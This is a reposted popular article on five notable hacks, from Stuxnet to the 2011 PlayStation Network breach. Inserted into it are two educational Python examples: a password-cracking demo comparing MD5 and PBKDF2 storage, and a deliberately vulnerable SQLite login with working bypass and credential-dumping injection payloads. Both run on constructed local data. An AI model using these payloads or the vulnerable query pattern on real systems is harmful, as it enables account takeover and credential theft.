THE FIVE BIGGEST HACKS IN HISTORY
Hacking and hackers are
the stuff of mythology, film, and often breathless headlines. From the attacks
that brought down Mastercard and Visa's websites in 2010 to the Xbox Live and
PlayStation outages of Christmas 2014, it sometimes feels like our systems are
under permanent assault from those who would take them offline.
And yet, none of these are true hacks - most
simply involve overloading websites with requests until they cease to function.
Hacking, as first demonstrated in 1903 by magician John Nevil Maskelyne when he hijacked a public demonstration of Marconi's wireless telegraph, involves gaining unauthorised access to a computer or IT system and requires some skill.
While small-scale attacks, malware and botnets
still do the rounds, large-scale disruptive hacks are rare. When they do
happen, though, they can be spectacular.
Here we clear out the DDoS dross and minor acts
of cyberhooliganism to bring you the five biggest hacks of all time.
#5
Stuxnet
The virus that destroyed nuclear equipment
Stuxnet is one of the best known names when it comes to cyber
attacks, and for good reason. The worm (a self-replicating, self-propagating
piece of malware) destroyed roughly a fifth of Iran's nuclear centrifuges in 2009,
seriously hindering the country's atomic plans.
But what makes Stuxnet really stand out among
all the destructive malware out there was just how well crafted it was.
According to Trend Micro, the Stuxnet payload consisted of three parts:
the worm itself (WORM_STUXNET), an execution .LNK file (LNK_STUXNET) that
allowed the worm to run automatically when a folder containing it was merely
viewed in Windows Explorer, and a rootkit (RTKT_STUXNET) that hid the
worm's existence.
It was also propagated by an unusual means. For four years, it was thought the
worm was introduced into the Natanz uranium enrichment facility, the primary
target of the attack (where about 1,000 centrifuges were damaged), via an infected USB
stick. However, researchers at Kaspersky Lab discovered in 2014 that the vector of
attack was in fact the plant's supply chain.
Five organisations supplying Natanz were the initial victims of Stuxnet, including a company named
NEDA, a supplier of the Siemens industrial control equipment that drove the centrifuges
and was the worm's real target (Siemens made the controllers, not the centrifuges
themselves). It's now thought that these organisations, and NEDA in
particular, were the real vector of infection.
So why wasn't the worm detected at this initial
point of infection? The answer lies in what Stuxnet did.
As Ralph Langner, one of the first people to decode the worm, put it in an
interview with the New York Times, Stuxnet was "a marksman's job". Unless it
found the specific Siemens controller configuration of a uranium enrichment
facility, it lay dormant, with the rootkit hiding its presence. There was no way
for the Stuxnet Typhoid Marys to know they were being used by the attackers.
Speaking of whom, this leads us to the last
question - whodunnit?
The sophistication of the Stuxnet program led
many to believe it was created by a nation state and, given the target, that
the US and Israel were probably involved.
Cables
obtained by Wikileaks that were republished by The Guardian showed
the US "was advised to adopt a policy of 'covert sabotage' of Iran's
clandestine nuclear facilities, including computer hacking and 'unexplained
explosions', by an influential German thinktank". The same thinktank
informed US officials in Germany that this kind of undercover operation
"would be 'more effective than a military strike' in curtailing Iran's
nuclear ambitions".
Suspicions of US involvement were bolstered by documents leaked to New York Times journalist
David Sanger.
In the end, the only reason we even know of Stuxnet's existence is thanks to a
botched software update that let the worm escape into the wild, where security
experts were able to analyse it.
Sanger's sources told him this led to panic in the Obama administration, for
precisely the reason that analysts would now be able to dissect the worm and work
out who had created it. Vice President Joe Biden allegedly blamed the escape on
the Israelis, which strongly suggested the two countries had collaborated on the worm.
#4
Mt. Gox hack
How can millions of dollars disappear without trace? This is the question
Mt. Gox, then the largest Bitcoin exchange in the world, faced in early 2014.
On 7 February, the exchange abruptly halted Bitcoin withdrawals, blaming a
"transaction malleability" bug in Bitcoin itself; by the end of the month it had
stopped trading and locked customers out of their accounts. Malleability meant a
third party could alter a transaction's identifier (txid) without invalidating its
signature, so an exchange that tracked withdrawals by the txid it had broadcast
could be told the payment never went through and be induced to send it again.
The organisation would later blame hackers for stealing $460 million-worth of
bitcoins over the course of three-to-four years, causing a crash in the value of
the cryptocurrency.
Hacking,
Distributed has done a good rundown of all the
explanations given for what happened in 2014 - which may ultimately have been
fraud or negligence, according to two lawsuits.
While this crisis led to the eventual bankruptcy of Mt. Gox, there was an
earlier hack that foreshadowed what was to come in 2014.
On 13 June 2011, 478 Mt. Gox accounts were robbed of a total of 25,000 bitcoins (worth between
$375,000 and $500,000 at the time), which were all transferred into a single
account.
Mt. Gox largely blamed the victims for
the theft, as the perpetrator had apparently used valid account passwords to
gain access and carry out the transaction.
"As a reminder we assume no responsibility should your funds be stolen by someone using your own password," said Mt. Gox CEO Mark Karpeles, using the alias MagicalTux.
However, the 25,000 bitcoin theft was just the
beginning. Towards the end of the same week, it became apparent the reason the
478 accounts were compromised using their own passwords was because a hacker
had managed to access the Mt. Gox database and steal the usernames and
passwords of all 60,000+ customers.
Karpeles seemed initially quite relaxed about
claims the entire Mt. Gox database had been compromised, saying :
"Passwords are encrypted one way (+salt). Someone cannot be selling 'user
+ pass' unless he has some way to revert this."
By 20 June, though, he was taking things
a bit more seriously, when a huge Bitcoin sale from one of the compromised
accounts caused the value of the cryptocurrency to crash to near zero.
In an official announcement on the Mt. Gox site, Karpeles explained that an admin account had been compromised and the attacker responsible had used the associated permissions to "arbitrarily assign himself a large number of bitcoins, which he subsequently sold on the exchange".
In doing this, the hacker flooded Mt. Gox with more
bitcoins than were actually in the exchange's wallet, bringing the value of the
cryptocurrency crashing down from $17.50/btc to $0.01/btc, while also relieving
another account of 2,000 bitcoins.
In the same statement, Karpeles also confirmed the
loss of the Mt. Gox database, stating this was likely how the hacker gained
access to the admin account that caused the crash and the one that was robbed
of 2,000 bitcoins.
The damage was undone by shutting down the exchange
and rolling back the transactions that had taken place during the attack, while
the lost 2,000 bitcoins were refunded at Mt. Gox's own expense.
What made the attack possible and successful,
though, wasn't just the SQL injection vulnerability in the Mt. Gox code that
gave the hacker access to the user database, or the fact that usernames and email
addresses were stored in plain text, or that it used the MD5 hashing algorithm
(a fast general-purpose hash; a slow, salted password hash such as bcrypt is the
right tool, and an unsalted SHA-2 would have been cracked almost as quickly), or
even that about 1,600 of the passwords were hashed but unsalted. It was Karpeles'
own unique brand of hubris and naïveté. Failing to take seriously the complaints
of the original 478 customers whose accounts were compromised - or even to
consider it a bit odd that nearly 500 people were hacked on the same day - was a
serious misstep; following it up by seemingly not caring that someone had stolen
an entire user database is mind-blowing.
In light of what happened in 2011, Mt. Gox's
complete failure in 2014 was perhaps inevitable.
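What Karpeles' "cannot be reverted" claim missed, and what the MD5-versus-SHA-2 framing above misses too: nobody reverts a hash. The attacker guesses passwords, hashes each guess the same way the site did, and compares. This is an added example, not Mt. Gox's or Sony's code; the users, passwords, salts and wordlist are constructed. It attacks three storage schemes with the same five-word list and counts how many primitive hash calls each attack costs. The same reasoning applies to the PlayStation Network database described further down the page.

```python
"""Dictionary attack against three password-storage schemes (added example)."""
import hashlib
import hmac
import os

ITERS = 100_000  # PBKDF2 iteration count, chosen for the example; production guidance is higher
WORDLIST = ["password", "letmein", "bitcoin2011", "hunter2", "qwerty123"]  # constructed


def md5_unsalted(pw):
    return hashlib.md5(pw.encode()).hexdigest()


def md5_salted(pw, salt):
    return hashlib.md5(salt + pw.encode()).hexdigest()


def pbkdf2(pw, salt):
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, ITERS)


def register(scheme, password):
    """What the database stores for one user under each scheme."""
    if scheme == "md5":
        return md5_unsalted(password)
    salt = os.urandom(16)
    if scheme == "md5+salt":
        return salt, md5_salted(password, salt)
    return salt, pbkdf2(password, salt)


def crack_md5(stored):
    """Unsalted: hash the wordlist once and look every user up in the table.
    Work = |wordlist|, however many users leaked."""
    table = {md5_unsalted(w): w for w in WORDLIST}
    found = {user: table[h] for user, h in stored.items() if h in table}
    return found, len(WORDLIST)


def crack_md5_salted(stored):
    """Per-user salt: the table trick fails and every (user, word) pair is hashed.
    Work = up to |users| * |wordlist| MD5 calls, still trivial because MD5 is fast."""
    found, work = {}, 0
    for user, (salt, h) in stored.items():
        for word in WORDLIST:
            work += 1
            if hmac.compare_digest(md5_salted(word, salt), h):
                found[user] = word
                break
    return found, work


def crack_pbkdf2(stored):
    """Salted and deliberately slow: same loop, but every guess costs ITERS HMAC calls."""
    found, work = {}, 0
    for user, (salt, h) in stored.items():
        for word in WORDLIST:
            work += ITERS
            if hmac.compare_digest(pbkdf2(word, salt), h):
                found[user] = word
                break
    return found, work


def demo():
    users = {"alice": "hunter2", "bob": "bitcoin2011", "carol": "Tr0ub4dor&3"}  # constructed
    results = {}
    for scheme, cracker in (("md5", crack_md5),
                            ("md5+salt", crack_md5_salted),
                            ("pbkdf2", crack_pbkdf2)):
        db = {user: register(scheme, pw) for user, pw in users.items()}
        results[scheme] = cracker(db)  # (cracked users, hash calls spent)
    return results


if __name__ == "__main__":
    for scheme, (found, work) in demo().items():
        print(f"{scheme:9s} cracked={found} work={work:,} hash calls")
```

Unsalted MD5 falls to five hash calls for any number of users, which is why a leaked 60,000-row table is no harder than one row. The salt forces one hash per user per guess (twelve here), but MD5 is fast enough that this barely slows anyone down. Only the slow KDF makes each guess expensive (1.2 million HMAC calls for the same twelve guesses), and swapping SHA-256 in for MD5 without the salt and the iteration count would cost the attacker the same five calls as the first scheme.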
#3
NASA and the Department of Defense hack
In the movies and on TV, when a young hacker
manages to get into military or government computer systems, they are normally
offered a job working for the FBI. The reality is quite different.
At the turn of the millennium, NASA and
the US Department of Defense (DoD) were successfully compromised by two
hackers, 15-year-old Floridian Jonathan
James and 35-year-old Scot Gary McKinnon.
James was the first to have a crack at
the American space agency, in 1999, getting in via computers he had compromised
at the US Defense Threat Reduction Agency.
Among other things, he managed to make off with the source code for the life support systems on the International Space Station (ISS). The Register reported it cost NASA alone $41,000 to repair the damage he had done.
Gary McKinnon has the dubious honour of being
accused by US prosecutors of perpetrating "the biggest military computer
hack of all time".
According to American authorities, between February
2001 and March 2002 he hacked into 97 computers, 16 belonging to NASA and 81
to the DoD.
During his actions, which he claims were a search for evidence of UFOs and of
suppressed new energy technologies, McKinnon is alleged to have paralysed
munitions supplies to the US Atlantic Fleet in the immediate aftermath of 9/11
by deleting weapons logs, and to have stolen 950 passwords and dozens of
documents along the way.
The cost of repairing the damage alleged to have
been caused by McKinnon was in excess of £550,000, the US government claimed.
As the hacks were carried out against the military,
it's not been made public how exactly James and McKinnon gained access to the
systems they did, but we do know what happened to the men in question.
McKinnon fought against extradition to the US for a decade, with Home Secretary Theresa May eventually blocking the extradition in October 2012, stating that handing him over to the US raised "such a high risk of him ending his own life" that it would breach his human rights. The director of public prosecutions, Keir Starmer, announced that December that no prosecution would be brought in the UK, as all the evidence was in the US.
James, on the other hand, was convicted in
September 2000 of hacking the DoD and NASA. However, as he was a minor when he
carried out the intrusions, he was sentenced to six months' house arrest and
probation until the age of 18, and had to write letters of apology to NASA and the DoD.
#2
Estonian cyber war
(Image caption: the statue that sparked the cyber war)
Yes, yes, we said we were clearing out the
DDoS dross in the introduction, but what happened
to Estonia in 2007 was no ordinary DDoS attack.
Kicking off at 10pm on 26 April, the Baltic state
suffered three weeks of DDoS attacks that crippled much of its IT
infrastructure.
The attackers first targeted the website of the ruling Reform Party and, over the course of the first week, went on to take down the sites of most other political parties, the official site of the Estonian Parliament and other government entities.
In the second week, the attack spread to the
websites of Estonian news outlets, universities, schools and businesses.
But it was in the third week that the real hammer
blow fell. At the stroke of midnight, Moscow time, on 9 May a huge torrent of
traffic - peaking at over 4 million data packets per second - slammed into
Estonia's banking infrastructure. This was a critical attack for a country that
had pioneered online banking and where, at the time, around 97% of all banking
transactions took place online.
Within 24 hours Hansapank, the country's largest
bank, took the drastic step of shutting off all its internet-based operations.
This not only disrupted online transactions, but also severed the connection
between the bank and its cash machines, rendering them inoperable. Perhaps
worse, Estonians outside of the country suddenly found their debit cards
wouldn't work, as the bank's actions cut it off from the rest of the world.
The attacks eventually subsided on 19 May.
Only one person has ever been charged in relation to what has since been termed the first cyber war, a 20-year-old ethnic Russian Estonian called Dmitri Galushkevich, who was fined the equivalent of £830. However, it's suspected that all the perpetrators were either Russians or ethnic Russian Estonians, partly because security experts subsequently found chats and threads about the attack on Russian-language forums, partly because a significant amount of traffic from the first wave of the attack was traced to Russia, and partly because of timing.
The attack followed two days of rioting in the
Estonian capital Tallinn over the relocation of a bronze war memorial dating
from the Soviet era. Perhaps even more damningly, the third wave of the attack
commenced on the Russian equivalent of VE Day.
Of all the lessons learnt from the Estonian cyber
assault - and there were many - probably the most important was the need to put
as much effort and money into protecting a country's online systems as building
them up. Estonia had earned the reputation of being "the most wired
country in Europe" at the time of the attacks, with the country pouring
vast amounts of money into growing its digital economy, but little into cyber
defences. It was this, rather than dependence on online systems per se, that
was the country's downfall when the botnets came knocking.
#1
PlayStation Network 2011 hack
Sometimes hackers manage to pull off something so
audacious it becomes part of infosec legend: the 2011 hack of the
PlayStation Network is one such case.
In mid-April 2011, users trying to log in to the
PlayStation Network (PSN) were greeted with a message stating the system was
"currently undergoing maintenance" or simply that "an error
[had] occurred", preventing them from logging in.
On 20 April, Sony acknowledged there was a problem
with "certain functions of PlayStation Network" and that it would
report back with more information when it was available.
Instead, later that night, Sony shut down the network
completely - an outage that would last a month.
One of the defining features of the early part of
the PSN hack was Sony's reticence to share information with the public. It took
two days for Sony to give any kind of explanation as to why it shut down the
PSN, and what information it did give was brief in the extreme.
A short post to the
PlayStation blog on 22 April from then director of corporate
communications, Patrick Seybold, said simply:
"An external intrusion on our system has affected [the] PlayStation Network and Qriocity (now Sony Music Unlimited) services. In order to conduct a thorough investigation and to verify the smooth and secure operation of our network services going forward, we turned off ... [the] services on the evening of Wednesday, April 20th."
It would be another four days until Sony revealed
the extent of what had happened, and it was huge.
Between 17 and 19 April, attackers who have never been publicly identified
breached Sony's security measures, gaining access to all 77 million users' real
names, postal addresses, country, email address, date of birth, PSN and/or
Qriocity username and password, and security answers.
While this would have been bad enough, it
was compounded by the fact that 12,700 card details, along with billing
addresses and purchase history, were also taken during the hack - although this wasn't confirmed until early May.
This led to Sony advising users not only to change
their PSN password once the service was online again, as well as that of any
other service where they'd used the same username and/or password, but also
"to be especially aware of email, telephone, and postal mail scams".
It also advised customers "to remain vigilant,
to review [their] account statements and to monitor [their] credit
reports" in order to protect against identity theft and financial fraud.
By the time full service was resumed on 31 May, the 2011 PSN hack had cost Sony $171 million and was, by volume, one of the biggest hacks ever at the time.
Sony has never revealed exact details of how its servers were breached, but it's thought a SQL injection and/or a modified PS3 may have been used. Once inside, the hackers were home free, because most non-financial details were stored in plain text. The only exception was the passwords, which Sony said were hashed rather than encrypted (MD5, according to reports); a fast general-purpose hash like that offers little resistance to offline dictionary cracking, so the advice to change any reused password was no overreaction.
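The injection that both the Mt. Gox and PSN breaches are said to have involved, as an added example against an in-memory SQLite table. This is not Sony's or Mt. Gox's code: the table, users, hashes and payloads are constructed, and MD5 is used only because that is what the page reports both sites stored. The vulnerable login pastes user input into the SQL text; the two payloads that bypass authentication and dump every credential through it do nothing against the parameterised version of the same query.

```python
"""SQL injection: vulnerable login, parameterised login, UNION-based dump (added example)."""
import hashlib
import sqlite3

QUERY = "SELECT id, username FROM users WHERE username = '%s' AND pw_md5 = '%s'"

BYPASS = "' OR 1=1 --"                                   # authenticates as the first user
DUMP = "' UNION SELECT username, pw_md5 FROM users --"   # returns every credential


def md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def build_db():
    """Constructed users table in the shape an exchange or game network might have had."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_md5 TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, pw_md5, email) VALUES (?, ?, ?)",
        [("alice", md5("hunter2"), "alice@example.com"),
         ("bob", md5("bitcoin2011"), "bob@example.com"),
         ("admin", md5("correct horse"), "admin@example.com")],
    )
    return conn


def _vulnerable_query(conn, username, password):
    # Deliberately vulnerable: user-controlled text becomes part of the SQL statement.
    return conn.execute(QUERY % (username, md5(password)))


def vulnerable_login(conn, username, password):
    return _vulnerable_query(conn, username, password).fetchone()


def safe_login(conn, username, password):
    """Same query with bound parameters: the driver never lets input become SQL."""
    query = "SELECT id, username FROM users WHERE username = ? AND pw_md5 = ?"
    return conn.execute(query, (username, md5(password))).fetchone()


def dump_credentials(conn):
    """UNION-based extraction through the vulnerable login. The first SELECT matches
    nothing; the injected second SELECT returns (username, pw_md5) for every row,
    which is the shape of 'the hacker accessed the user database'."""
    return _vulnerable_query(conn, DUMP, "anything").fetchall()


if __name__ == "__main__":
    db = build_db()
    print("bypass via vulnerable login:", vulnerable_login(db, BYPASS, "wrong"))
    print("same payload, safe login:   ", safe_login(db, BYPASS, "wrong"))
    for row in dump_credentials(db):
        print("dumped:", row)
```

Bound parameters are the fix. Hand-escaping quotes, which is what sites of that era typically did, is exactly what the `--` comment and UNION tricks above are designed to slip past.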
While Sony has been the victim of subsequent hacks
and attacks - most recently the Christmas 2014 DDoS of the PSN and the November
2014 hack of Sony Pictures Entertainment - spring 2011 stands out as a beacon of
poor crisis management and data security that won't be forgotten anytime soon.
info source @ www.alphr.com
Very interesting post
Good one...
Nice